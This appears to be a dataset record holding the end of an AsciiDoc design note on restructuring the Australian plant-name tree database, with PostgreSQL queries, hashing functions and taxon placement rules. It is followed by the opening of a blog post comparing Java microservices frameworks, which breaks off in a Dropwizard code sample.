\"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/224706\"\n },\n \"Superordo\": {\n \"id\": 216053.0,\n \"name\": \"Lilianae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/216053\"\n },\n \"Subclassis\": {\n \"id\": 214954.0,\n \"name\": \"Magnoliidae\",\n \"name_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/214954\"\n }\n },\n \"namePath\": \"Plantae\/Charophyta\/Equisetopsida\/Magnoliidae\/Lilianae\/Alismatales\/Juncaginaceae\",\n \"displayString\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"sourceShard\": \"APNI\",\n \"synonyms\": null,\n \"profile\": {\n \"APC Dist.\": {\n \"value\": \"WA (naturalised), NT, SA, Qld, NSW (native and naturalised), LHI, ACT, Vic (native and naturalised), Tas\",\n \"created_at\": \"2009-09-08T00:00:00+10:00\",\n \"created_by\": \"KIRSTENC\",\n \"updated_at\": \"2009-09-08T00:00:00+10:00\",\n \"updated_by\": \"KIRSTENC\",\n \"source_link\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instanceNote\/apni\/1110848\"\n }\n },\n \"children\": [\n {\n \"displayHtml\": \"<data><scientific><name id='54576'><element class='Juncaginaceae'>Juncaginaceae<\/element> <authors><author id='7128' title='Richard, L.C.M.'>Rich.<\/author><\/authors><\/name><\/scientific><citation>CHAH (2008), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479620\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/54576\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/650575\",\n \"excluded\": false,\n \"depth\": 7,\n \"synonymsHtml\": \"<synonyms><\/synonyms>\"\n },\n\n ...\n\n {\n \"displayHtml\": \"<data><scientific><name id='215455'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific><citation>CHAH (2006), <i>Australian Plant Census<\/i><\/citation><\/data>\",\n \"elementLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/tree\/9476777\/9479645\",\n \"nameLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/name\/apni\/215455\",\n \"instanceLink\": \"http:\/\/test-id-vasc.biodiversity.org.au\/instance\/apni\/635661\",\n \"excluded\": false,\n \"depth\": 9,\n \"synonymsHtml\": \"<synonyms><tax><scientific><name id='103161'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6955' title='Ewart, A.J.'>Ewart<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><tax><scientific><name id='7377413'><scientific><name id='100623'><element class='Triglochin'>Triglochin<\/element><\/name><\/scientific> <element class='turrifera'>turrifera<\/element> <authors><author id='6833' title='Gardner, C.A.'>C.A.Gardner<\/author><\/authors><\/name><\/scientific> <type>taxonomic synonym<\/type><\/tax><\/synonyms>\"\n }\n ]\n }\n\n}\n----\n\n\n\n==== Editor\n\n|===\n|work| notes| effort\n|convert views| mostly simple changes but need to handle node type| 10h\n|refactor models| the DB models need to be replaced with new models hopefully returning only 
relevant data| 40h
|refactor the tree editing tab| with the refactoring of the tree edit service end points this should be a minimal change,
only replacing some of the reference keys like the voc:AcpComment stuff.| 40h
|||90h
|===

The editor uses views to check if a name is currently accepted:

 * accepted_name_vw
 * accepted_synonym_vw

We would need to change code around type_code, which relates directly to tree_node.type_uri_id_part.

The editor also models

 * TreeArrangement
 * TreeLink
 * TreeNode
 * TreeUriNs
 * TreeValueUri
 * AcceptedConcept
 * AcceptedInSomeWay

which would all need refactoring for usage.

There are two different editors for the tree in the instance editor; the current AngularJS based one can be removed
completely and be replaced with the workspace based one that uses the following service end points:

 * treeEdit/updateValue
 * treeEdit/placeNameOnTree
 * treeEdit/removeNameFromTree

==== New tree editor

|===
|work| notes| effort
|Add admin tasks to admin pages| This should be a straightforward form| 20h
|Add a tree view| This should already be part of the new tree_element object display replacing the node object| included
|rework validation code| see services | included
|||20h
|===

This editor needs to be incorporated into the instance editor. The new structure will make this easier, but this is
possibly not required in the first iteration of this change.

Basically we need to be able to create trees and workspaces and publish or delete a workspace. Create and delete are
part of the existing API on the services.

We will make the basic tree administration part of the existing services and incorporate the editing into the instance
editor. We will develop a tree view for both the editor and services, where the editor view will allow access to
instance editing etc.

We will re-implement the validation code on the new tree structure as a callable service, and as part of the placement
actions.

==== New search

|===
|work| notes| effort
|convert views| mostly simple changes but need to handle node type| 10h
|refactor models| the DB models need to be replaced with new models hopefully returning only relevant data| 40h
|||50h
|===

The new search app uses the following views:

 * accepted_name_vw
 * accepted_synonym_vw
 * instance_resource_vw
 * name_instance_vw
 * name_or_synonym_vw

It models:

 * TreeArrangement
 * TreeNode

== Other stuff

At the moment the name tree has namespaces and the lichen name tree has 31 Fungi namespaced names. This doesn't work,
as a tree can only have one namespace.
I have changed the lichen names to all have the same namespace (Lichen)\nso that the current name tree works kind of....\n\nBut this is going to bring up a problem we'll have to deal with where we have intersecting trees.\n\n== Query Examples\n\nThis section is for documenting some query examples using the new tree structure.\n\n=== Search for synonyms of a type in a tree\n\n[source,sql]\n.search-synonyms.sql\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms ->> tax_syn,\n rank.name,\n type.name,\n el.name_path\nFROM tree_element el\n JOIN name n ON el.name_id = n.id\n JOIN name_rank rank ON n.name_rank_id = rank.id\n JOIN name_type type ON n.name_type_id = type.id\n ,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 144\n AND type.scientific\n AND tax_syn ILIKE 'Billardiera b%'\n AND synonyms -> tax_syn ->> 'type' = 'taxonomic synonym'\nORDER BY el.name_path;\n----\n\n|===\n| name_id | simple_name | tax_syn | syn_data | rank | type| name_path\n|55543|Billardiera scandens|Billardiera brachyantha|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 230111}\"|Species|scientific| Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens\n|55543|Billardiera scandens|Billardiera brachyantha var. brachyantha|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 55168}\"|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Billardiera scandens\n|84869|Marianthus bicolor|Billardiera bicolor var. lineata|\"{\"\"type\"\": \"\"taxonomic synonym\"\", \"\"name_id\"\": 55149}\"|Species|scientific|Plantae Charophyta Equisetopsida Magnoliidae Asteranae Apiales Pittosporaceae Marianthus bicolor\n\n|===\n\n=== find leaf paths\n\n[source]\n.leaf-paths.sql\n----\n-- find leaf paths\nSELECT e.tree_path as paths\nFROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\nwhere tve.tree_version_id = 9451356\n and not exists(select 1 from tree_version_element ctve join tree_element ce on ctve.tree_element_id = ce.id\nwhere ctve.tree_version_id = 9451356 and ce.parent_element_id = e.id)\nORDER BY e.tree_path\n----\n\n=== circumscribe a taxon at a version\n\nThis function takes a tree version id and a tree_path and gives a sha256 hash of all the leaf node child paths. 
The\neffectively gives a comparable hash of the circumscription of this taxon which can be used as an identifier that can\ncompare the taxon concept here.\n\n[source]\n.circumscribe.sql\n----\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT encode(digest(string_agg(paths, ''), 'sha256'), 'hex')\nFROM (\n SELECT e.tree_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.tree_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n\nselect circumscribe(9451356, '\/9451389');\n----\n\nor better still using the simple sha256agg function\n\n[source]\n.circumscribe.sql\n----\nCREATE EXTENSION pgcrypto;\n\nDROP FUNCTION IF EXISTS circumscribe( BIGINT, TEXT );\nCREATE FUNCTION circumscribe(version_id BIGINT, path_match TEXT)\n RETURNS TEXT\nLANGUAGE SQL\nAS\n$$\nSELECT sha256_agg(paths)\nFROM (\n SELECT e.tree_path AS paths\n FROM tree_version_element tve\n JOIN tree_element e ON tve.tree_element_id = e.id\n WHERE tve.tree_version_id = version_id\n AND e.tree_path LIKE path_match || '%'\n ORDER BY e.tree_path\n ) AS circumscription;\n$$;\n----\n\n=== A simple md5_agg aggregate function\n\n[source]\n.md5_agg.sql\n----\nDROP AGGREGATE IF EXISTS md5_agg( TEXT );\nDROP FUNCTION IF EXISTS md5agg_sfunc( TEXT, TEXT );\nDROP FUNCTION IF EXISTS md5agg_finalfunc( TEXT );\n\nCREATE FUNCTION md5agg_sfunc(agg_state TEXT, el TEXT)\n RETURNS TEXT\nIMMUTABLE\nLANGUAGE plpgsql\nAS $$\nDECLARE\n current_sum TEXT;\nBEGIN\n -- RAISE NOTICE 'current state %', agg_state;\n current_sum := md5(coalesce(agg_state, '') || el);\n -- raise notice 'agg state %',current_sum;\n RETURN current_sum;\nEND;\n$$;\n\nCREATE FUNCTION md5agg_finalfunc(agg_state TEXT)\n RETURNS TEXT\nIMMUTABLE\nSTRICT\nLANGUAGE plpgsql\nAS $$\nBEGIN\n RETURN agg_state;\nEND;\n$$;\n\nCREATE AGGREGATE md5_agg ( TEXT )\n(\nSFUNC = md5agg_sfunc,\nSTYPE = TEXT,\nFINALFUNC = md5agg_finalfunc\n);\n----\n\n=== A simple sha256_agg function\n\n[source]\n.sha256_agg.sql\n----\nDROP AGGREGATE IF EXISTS sha256_agg( TEXT );\nDROP FUNCTION IF EXISTS sha256agg_sfunc( TEXT, TEXT );\nDROP FUNCTION IF EXISTS sha256agg_finalfunc( TEXT );\n\nCREATE FUNCTION sha256agg_sfunc(agg_state TEXT, el TEXT)\n RETURNS TEXT\nIMMUTABLE\nLANGUAGE plpgsql\nAS $$\nDECLARE\n current_sum TEXT;\nBEGIN\n -- RAISE NOTICE 'current state %', agg_state;\n current_sum := encode(digest((coalesce(agg_state, '') || el), 'sha256'), 'hex');\n -- raise notice 'agg state %',current_sum;\n RETURN current_sum;\nEND;\n$$;\n\nCREATE FUNCTION sha256agg_finalfunc(agg_state TEXT)\n RETURNS TEXT\nIMMUTABLE\nSTRICT\nLANGUAGE plpgsql\nAS $$\nBEGIN\n RETURN agg_state;\nEND;\n$$;\n\nCREATE AGGREGATE sha256_agg ( TEXT )\n(\nSFUNC = sha256agg_sfunc,\nSTYPE = TEXT,\nFINALFUNC = sha256agg_finalfunc\n);\n----\n\n=== To sum the total data size of the tree_element table\n\n[source]\n.sum_tree_element.sql\n----\nselect\n pg_size_pretty(sum(pg_column_size(tree_version_id))) as tree_version_id_size,\n pg_size_pretty(sum(pg_column_size(tree_element_id))) as tree_element_id_size,\n pg_size_pretty(sum(pg_column_size(lock_version))) as lock_version_size,\n pg_size_pretty(sum(pg_column_size(display_string))) as display_string_size,\n pg_size_pretty(sum(pg_column_size(element_link))) as element_link_size,\n pg_size_pretty(sum(pg_column_size(excluded))) as excluded_size,\n 
pg_size_pretty(sum(pg_column_size(instance_id))) as instance_id_size,\n pg_size_pretty(sum(pg_column_size(instance_link))) as instance_link_size,\n pg_size_pretty(sum(pg_column_size(name_id))) as name_id_size,\n pg_size_pretty(sum(pg_column_size(name_link))) as name_link_size,\n pg_size_pretty(sum(pg_column_size(name_path))) as name_path_size,\n pg_size_pretty(sum(pg_column_size(names))) as names_size,\n pg_size_pretty(sum(pg_column_size(parent_version_id))) as parent_version_id_size,\n pg_size_pretty(sum(pg_column_size(parent_element_id))) as parent_element_id_size,\n pg_size_pretty(sum(pg_column_size(previous_version_id))) as previous_version_id_size,\n pg_size_pretty(sum(pg_column_size(previous_element_id))) as previous_element_id_size,\n pg_size_pretty(sum(pg_column_size(profile))) as profile_size,\n pg_size_pretty(sum(pg_column_size(rank_path))) as rank_path_size,\n pg_size_pretty(sum(pg_column_size(simple_name))) as simple_name_size,\n pg_size_pretty(sum(pg_column_size(source_element_link))) as source_element_link_size,\n pg_size_pretty(sum(pg_column_size(source_shard))) as source_shard_size,\n pg_size_pretty(sum(pg_column_size(synonyms))) as synonyms_size,\n pg_size_pretty(sum(pg_column_size(tree_path))) as tree_path_size,\n pg_size_pretty(sum(pg_column_size(updated_at))) as updated_at_size,\n pg_size_pretty(sum(pg_column_size(updated_by))) as updated_by_size\n from tree_element;\n----\n\n=== To find the total used sizes of tables in the database\n\n[source]\n.table_size.sql\n----\nSELECT\n *,\n pg_size_pretty(total_bytes) AS total,\n pg_size_pretty(index_bytes) AS INDEX,\n pg_size_pretty(toast_bytes) AS toast,\n pg_size_pretty(table_bytes) AS TABLE\nFROM (\n SELECT\n *,\n total_bytes - index_bytes - COALESCE(toast_bytes, 0) AS table_bytes\n FROM (\n SELECT\n c.oid,\n nspname AS table_schema,\n relname AS TABLE_NAME,\n c.reltuples AS row_estimate,\n pg_total_relation_size(c.oid) AS total_bytes,\n pg_indexes_size(c.oid) AS index_bytes,\n pg_total_relation_size(reltoastrelid) AS toast_bytes\n FROM pg_class c\n LEFT JOIN pg_namespace n ON n.oid = c.relnamespace\n WHERE relkind = 'r' and nspname = 'public'\n ) a\n ) a;\n----\n\n=== fix the depth of all elements in a tree version\n\n[source:sql]\n.update depth.sql\n----\nDO $$\nDECLARE\n c CURSOR FOR\n SELECT tve.parent_id\n FROM tree_version_element tve\n JOIN tree ON tve.tree_version_id = tree.default_draft_tree_version_id AND tree.name = 'APC'\n ORDER BY tve.tree_path\n FOR UPDATE;\nBEGIN\n FOR row IN c LOOP\n UPDATE tree_version_element\n SET depth = coalesce ((select depth + 1 from tree_version_element where element_link = row.parent_id), 1)\n WHERE CURRENT OF c;\n END LOOP;\nEND\n$$\n----\n\nThis works, but sets the depth assuming the top element has the correct depth. The below solution\nis better because it uses the tree_path to set the depth by counting the number of '\/' chars\n\n[source:sql]\n.update depth.sql\n----\nUPDATE tree_version_element\nSET depth = array_length(regexp_split_to_array(tree_path, '\/'),1) - 1\nWHERE tree_version_id = 50617332\nAND tree_path ~ '\/50617337';\n----\n\n== Placement Rules\n\nNOTE: there is a new more succinct document \"placement-rules.adoc\" which is based directly on the new implementation\nafter we've tested and reviewed the results with users. 
Consider this document to be the before picture and that as the
after.

This is an interpretation of the results of the discussion at https://www.anbg.gov.au/ibis25/display/NSL/Tree+Monitor+Functionality
regarding the placement rules.

This is from the point of view of attempting to place an instance on a version of a tree. The version of the tree must
be consistent within these rules. We take it that an Instance == Concept == Taxon == Taxon concept. The Instance being
placed has already been chosen appropriately in an editor.

WARNING: We need to look at the difference between validating a placement before it's been made, and validating a
whole tree that has already been created.

=== The Taxon should not already be on the tree
=== A Taxon's Name can not be in the tree as an accepted name more than once
=== The Taxon's Name Rank must be below the parent taxon's rank
=== A relationship instance can't be put on the tree
=== Polynomial names must be a child of the name parent except excluded names

e.g. Doodia caudata must be placed under Doodia

=== Hybrid names must be a child of the first hybrid name

e.g. Blechnum cartilagineum Sw. x Doodia media R.Br. must be placed under Blechnum cartilagineum

=== An accepted name can't be placed under an excluded name

All names above an accepted name must also be accepted.

=== Illegal and illegitimate names *should not* be placed on the tree

This is a warning only, because there are illegitimate names used in APC where a phrase name would otherwise have to be created.


=== A Taxon's Name or Synonyms can only be in the tree once.

Checking for synonyms needs to be done from a point of view. For example with Ficus virens
(see https://biodiversity.org.au/nsl/services/search?product=APC&tree.id=1133571&name=Ficus+virens&inc._scientific=&inc.scientific=on&inc._cultivar=&inc._other=&max=100&display=apc&search=true)

Ficus virens var. sublanceolata (Miq.) Corner is a synonym of Ficus virens according to CHAH 2005, but not according to
CHAH 2016, which has them as distinct taxa (so they can both be accepted). The existing code for findSynonymOfInstance
checks if a placed instance is cited by the instance you wish to place in any reference (other relationship instance).
If you try to place Ficus virens Aiton (CHAH 2016) it will bring up the CHAH 2005 instance, which isn't relevant because
your view (sensu) is CHAH 2016.

So we should check synonymy from the point of view of the taxon being placed, and then from the already placed taxa back to the
taxon being placed, e.g. from Ficus virens var. sublanceolata.

To warn on taxonomic synonyms we need to check the name of the instance. For example, if you try to place Woodwardia Sm.
under Blechnaceae using Mueller, F.J.H. von (1882), Systematic Census of Australian Plants, which considers Doodia R.Br.
to be a synonym, but the instance of Doodia on the tree does not consider Woodwardia a taxonomic synonym, you won't see
the apparently obvious conflict in this placement because the cited instance is not on the tree. So if the instance being
placed cites a Name as being a synonym we should probably warn the user.

* relationship instances can't be placed on the accepted tree
* misapplication synonyms can be ignored.
* warn if pro
parte synonyms exist elsewhere in the current tree\n\n=== A name once on the tree should always be accounted for on the tree\n\nA name *should* not be removed from a tree, it should be accounted for within the accepted names or synonyms.\n\n==== Implementation within the tree\n\nThe Synonyms field in the Tree Element shows the synonym name and the type. We need to use the synonyms JSON structure to\ndetermine if the name exists as a synonym in the context of what is on the tree currently and that no synonyms of the taxon\nbeing placed are on the tree.\n\nSo if we try and place 'Ficus cunninghami' we might use...\n\n[source]\n.find-synonym-of.sql\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms ->> tax_syn,\n el.names,\n el.name_path\nFROM tree_element el\n JOIN name n ON el.name_id = n.id,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 146\n AND el.names like '%|Ficus cunninghami|%'\n AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'\n and tax_syn = 'Ficus cunninghami'\n----\n\nWhich takes around 60-70ms to find Ficus virens. Note the LIKE on el.names limits the search quickly before using the slower\njsonb queries, and is quicker than the equivalent regex.\n\n[source]\n.explain\n----\nNested Loop (cost=0.98..127531.08 rows=3 width=342)\n -> Nested Loop (cost=0.98..127525.04 rows=3 width=310)\n -> Index Scan using tree_element_pkey on tree_element el (cost=0.56..127511.69 rows=3 width=310)\n Index Cond: (tree_version_id = 146)\n Filter: (names ~~ '%|Ficus cunninghami|%'::text)\n -> Index Only Scan using name_pkey on name n (cost=0.42..4.44 rows=1 width=8)\n Index Cond: (id = el.name_id)\n -> Function Scan on jsonb_object_keys tax_syn (cost=0.00..2.00 rows=1 width=32)\n Filter: ((tax_syn = 'Ficus cunninghami'::text) AND (((el.synonyms -> tax_syn) ->> 'type'::text) !~ '.*(misapp|pro parte).*'::text))\n----\n\nif we repeat that search for all the names in the el.names string for the name we're trying to place, then we would have\nfound all matching names both ways.\n\nSo for example we can find all the clashing synonyms for an instance using:\n\n[source]\n.find_synonyms\n----\nSELECT\n el.name_id,\n el.simple_name,\n tax_syn,\n synonyms -> tax_syn ->> 'type' as syn_type,\n synonyms -> tax_syn ->> 'name_id' as syn_id\nFROM tree_element el\n JOIN name n ON el.name_id = n.id,\n jsonb_object_keys(synonyms) AS tax_syn\nWHERE tree_version_id = 146\n AND synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte).*'\n and tax_syn in (select synonym.simple_name as sn\nfrom Instance s join instance_type it on s.instance_type_id = it.id,\n Name synonym\nwhere s.cited_by_id = :instance_id_to_place\n and synonym.id = s.name_id\n and it.misapplied = FALSE\n and it.pro_parte = FALSE\n);\n----\n\nUsing the above if we try and place Ficus virens var. sublanceolata sensu Jacobs & Packard (1981) plants of NSW instance 692695\nwe get the results:\n\n|===\n|name_id|simple_name|tax_syn|syn_type|syn_id\n\n|75398|Ficus virens|Ficus cunninghamii|taxonomic synonym|90744\n|75398|Ficus virens|Ficus infectoria var. 
cunninghamii|taxonomic synonym|91343\n|===\n\n==== Checking the validity of an existing tree\n\nCheck all names in the tree for synonyms of that name in the tree:\n(See https:\/\/www.anbg.gov.au\/25jira\/browse\/NSL-2484)\n\n[source]\n.findSynonyms in tree\n----\n-- updated for tree_version_element join table\nSELECT\n e1.simple_name AS name1,\n e1.name_id,\n e2.simple_name AS name2,\n e2.name_id,\n tax_syn AS name2_synonym,\n e2.synonyms -> tax_syn ->> 'type' AS type\nFROM tree t,\n tree_version_element tve1\n JOIN tree_element e1 ON tve1.tree_element_id = e1.id\n ,\n tree_version_element tve2\n JOIN tree_element e2 ON tve2.tree_element_id = e2.id\n ,\n jsonb_object_keys(e2.synonyms) AS tax_syn\nWHERE t.name = 'APC'\n AND tve1.tree_version_id = t.current_tree_version_id\n AND tve2.tree_version_id = t.current_tree_version_id\n AND tve2.tree_element_id <> tve1.tree_element_id\n AND e1.excluded = FALSE\n AND e2.excluded = FALSE\n AND e2.synonyms IS NOT NULL\n AND (e2.synonyms -> tax_syn ->> 'name_id') :: BIGINT = e1.name_id\n AND e2.synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte|common).*';\n----\n\nNOTE: we've used the current APC tree above.\n\n== Running the migration\n\nThe services will run a migration script on startup which will alter the DDL, adding tables and indexes. It will then\nmigrate all the nodes and versions over as well as setting the family of the names. It will use the preferred host from\nthe mapper to set the links in the tree_element and tree_version_element tables, which means we probably have to manually\ndo this for the moss and lichen shards.\n\nWARNING: *BEFORE you run the services\/upgrade script make sure the preferred host is set correctly if you're running it locally\nor in test.*\n\nAfter the upgrade script has run we need to run the \"tree-element-mapper-links.sql\" script to add all the mapper links.\n\nNOTE: we need to delete from notification due to all the changes to name.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25b27635b7a6173e34cf4b5de64e1bc795d76401","subject":"Update 2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","message":"Update 2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","new_file":"_posts\/2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","new_contents":"= A comparison of Microservices Frameworks\n:hp-tags: Tech, Microservices, REST\n\nMicroservice is probably one of the most used terms nowadays when speaking about software architecture. Although the underlying concepts aren't new, it is one of the biggest buzzwords of the last two years.\n\nTo summarize, big monolithic architectures tend to become hard to maintain and extend when they grow over a certain size. Moreover, they don't scale well (you scale by multiplying big applications), and you can't replace old parts easily.\n\nOne of the biggest advantages of microservices is to address these concerns: instead of building an entire application as one block, one can build it as a set of services which will communicate over some kind of messaging system (most of the time, REST over HTTP). Given that, you will be able to replace one piece if you need to, you can scale only one piece because you need to, and so on.\n\nBut there is a counterpart: as you're building a distributed system, you will have the disadvantages of a distributed system.
Building a distributed system as a microservices architecture is not that easy, but fortunately there are many frameworks to help you. This article will present some of them.\n\n\n== Requirements\n\nI don't want to make another comparison based on some \"Hello World\" application. Most of the frameworks provide a simple way to start a server and respond to a simple request with only one line.\n\nBut this is not real life. In real life, you should not use plain HTTP. You would use REST over HTTPS and have an HTTPS client. You would add a Location header after a successful creation, and add links to your JSON or XML representations. You would have metrics included, to monitor your application. You would have some kind of security to protect the access to your API.\n\nHere is a list of what I am going to evaluate.\n\n* I'm about to build a tiny RESTful API. UI is not considered in this article (note that every candidate framework has a means to serve static resources easily)\n* Only use HTTPS to access the API\n* The API will have two sets of resources (aka two microservices). For simplicity's sake, they will be deployed in the same server, but will communicate over HTTPS.\n* The resource will have a JSON representation\n* Each representation will have at least a self link to the resource\n* After a resource creation, the client receives a Location header (the resource's link)\n* The API will be accessible only by people providing a Facebook OAuth token\n* Each API must have a monitoring \/ metrics facility\n* Each service may be packaged as a standalone jar, to be run using `java -jar`.\n* On the performance side, I will measure:\n** request time of POST and GET\n** the startup time of each server (not that important, but interesting)\n** the memory footprint of the application\n* Finally, I will give the final size of the package.\n\n== The candidates\n\nHere is the list of candidates:\n\n* http:\/\/www.dropwizard.io\/[Dropwizard]\n* http:\/\/vertx.io\/[Vertx]\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot]\n* http:\/\/restlet.com\/projects\/restlet-framework\/[Restlet]\n* http:\/\/sparkjava.com\/[Spark] + http:\/\/unirest.io\/java.html[Unirest] (REST client, Spark doesn't provide a REST client itself)\n\nNote that Restlet and Spark don't claim to be MicroServices frameworks, but Restlet is known to be a very good REST framework, and Spark is so lightweight that I couldn't resist trying it against bigger frameworks like Spring Boot.\n\n== Prerequisites\n\nEach sample runs with a simple `java -jar` command. You will need to set some properties to enable SSL: `-Djavax.net.ssl.trustStore=... -Djavax.net.ssl.trustStorePassword=... -Djavax.net.ssl.keyStorePassword=... -Djavax.net.ssl.keyStorePath=...`.\n\nIn order to be able to run the samples, you need to create a keystore (see http:\/\/www.javacodegeeks.com\/2014\/07\/java-keystore-tutorial.html[this tutorial] for example), and install a self-signed certificate. You will need the Facebook certificate too (see http:\/\/serverfault.com\/questions\/139728\/how-to-download-the-ssl-certificate-from-a-website[here] how to get it), and a user token (see https:\/\/developers.facebook.com\/).\n\nDon't forget to modify the configuration files and system properties accordingly. All these steps are explained in the README file.\n
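\nTo check the keystore and trust store setup before diving into the frameworks, here is a quick hedged sketch (a throwaway class of my own, not part of any sample) that relies on the same `javax.net.ssl` system properties:\n\n[source,java]\n----\nimport java.net.URL;\nimport javax.net.ssl.HttpsURLConnection;\n\npublic class SslSmokeTest {\n public static void main(String[] args) throws Exception {\n \/\/ The -Djavax.net.ssl.* properties configure the default SSL context used here.\n HttpsURLConnection connection =\n (HttpsURLConnection) new URL(\"https:\/\/localhost:8443\/app\/cars\").openConnection();\n \/\/ Even a 401 proves the TLS handshake worked; add the OAuth header to get a 200.\n System.out.println(\"HTTP \" + connection.getResponseCode());\n }\n}\n----\n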
\n== Dropwizard\n\nAs stated by its website, \"`Dropwizard is a Java framework for developing ops-friendly, high-performance, RESTful web services.`\". It is a bundle of some successful libraries such as Jetty, Jersey and Jackson. The documentation is very good, I've found everything I needed inside; a good point, as I hate being forced to search for minutes (hours?) for something supposedly simple.\n\n=== Main\n\nThe main method is quite simple: you just build an `Application` instance and run it:\n[source,java]\n----\npublic static void main(String[] args) throws Exception {\n new DropwizardApplication().run(args);\n}\n----\n\nThe `DropwizardApplication` class contains all the plumbing: resource and health checks registration, Guice bootstrapping and Jackson's `ObjectMapper` configuration. It is given an instance of a configuration class (`DropwizardServerConfiguration`) which is a POJO holding the configuration properties read from the YAML file passed as parameter to our application.\n\nThe app is run with parameters: `java -jar app.jar server config.yml`. The `server` parameter is here to tell Dropwizard to start the server, but you can also manipulate the database (I didn't try this).\n\n=== Resources\n\nUnder the hood, Dropwizard uses Jersey, so the resources are just POJOs annotated with (a lot of) JAX-RS annotations:\n\n[source,java]\n----\n@Path(\"\/cars\/{id}\")\n@Produces(MediaType.APPLICATION_JSON)\npublic class CarResource {\n\n @Context\n UriInfo uriInfo;\n\n @Inject\n private CarRepository carRepository;\n\n @GET\n public Response byId(@Auth User user, @PathParam(\"id\") int carId) {\n Optional<Car> car = carRepository.byId(carId);\n return car.map(c -> {\n CarRepresentation carRepresentation = new CarRepresentation(c);\n carRepresentation.addLink(Link.self(uriInfo.getAbsolutePathBuilder().build(c.getId()).toString()));\n return Response.ok(carRepresentation).build();\n }).orElse(Response.status(Response.Status.NOT_FOUND).build());\n }\n}\n----\n\nAll the underlying HTTP handling is done by the framework; you have no mandatory access to request and response objects. In this case, the method returns a `Response`, but I could simply have returned the object; however, in that case the return code would not be the right one (201), so to have full control over it, I prefer this solution. Moreover, the 404 (Status.NOT_FOUND) is set on the response; I could throw an exception instead, and write a mapper to make an adequate response, but it's overkill (and I hate so-called \"Business Exceptions\").\n\nNote that injection is performed by Guice. It seems that there is a CDI container provided with Jersey (hk2), but I didn't manage to make it work. Linking is done by hand, and is quite easy with the `UriInfo` object.\n\nDropwizard uses Jackson to serialize \/ deserialize the object returned to JSON, so you have nothing special to do... but you have to configure the `ObjectMapper` to disable errors on unknown properties (see http:\/\/martinfowler.com\/bliki\/TolerantReader.html[Tolerant Reader]).\n
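\nFor creation, the 201-plus-Location requirement can be met the same way; a minimal sketch (this POST method and `carRepository.save()` are hypothetical — imagine it on a `\/cars` resource — not taken from the sample project):\n\n[source,java]\n----\n@POST\npublic Response create(@Auth User user, Car car) {\n Car saved = carRepository.save(car); \/\/ hypothetical repository method\n \/\/ 201 Created, with a Location header pointing at the new resource\n return Response.created(uriInfo.getAbsolutePathBuilder()\n .path(String.valueOf(saved.getId())).build()).build();\n}\n----\n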
\n=== HTTPS\n\nHTTPS is configured in the YAML configuration file; the framework ignores the standard Java properties. The documentation explains exactly how to set it up, and there is no surprise here.\n\n=== REST client\n\nThe REST client is built by Guice, as a singleton; it is not managed as documented, I didn't manage to make it work this way. Otherwise, nothing special about the client, the API is fluent and simple:\n\n[source,java]\n----\n@Override\npublic List<Car> getAllCars(String auth) {\n WebTarget target = client.target(\"https:\/\/localhost:8443\/app\/cars\");\n Invocation invocation = target.request(MediaType.APPLICATION_JSON)\n .header(\"Authorization\", \"Bearer \" + auth)\n .build(HttpMethod.GET);\n Car[] cars = invocation.invoke(Car[].class);\n return asList(cars);\n}\n----\n\nThe `Client`, this time, uses the standard properties.\n\n=== Security\n\nThe authentication requires two things: first, implement the `Authenticator` interface. Note that the single method `authenticate` returns an `Optional<User>`, but not Java 8's `Optional`: Guava's one! What a pity... Never mind. Second, you need to register the authenticator against Jersey:\n\n[source,java]\n----\nenvironment.jersey().register(AuthFactory.binder(\n new 